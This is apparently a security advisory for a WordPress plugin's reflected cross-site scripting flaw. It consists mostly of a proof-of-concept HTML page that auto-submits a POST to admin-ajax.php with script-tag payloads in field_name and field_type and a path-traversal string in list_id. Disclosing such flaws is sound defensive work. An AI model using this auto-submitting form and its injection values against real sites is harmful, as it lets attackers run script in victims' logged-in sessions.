The plugin does not sanitise and escape the field_name and field_type parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="add_field_to_form" />
<input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' />
<input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' />
<input type="hidden" name="list_id" value="../../../../../" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>